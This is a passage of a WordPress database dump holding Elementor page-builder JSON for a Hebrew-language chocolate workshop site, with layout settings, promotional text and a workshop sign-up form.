\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"Your Email\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(214,56,'_elementor_version','0.4'),(215,57,'_wp_page_template','elementor_canvas'),(216,57,'_elementor_edit_mode','builder'),(217,57,'_elementor_template_type','post'),(218,57,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\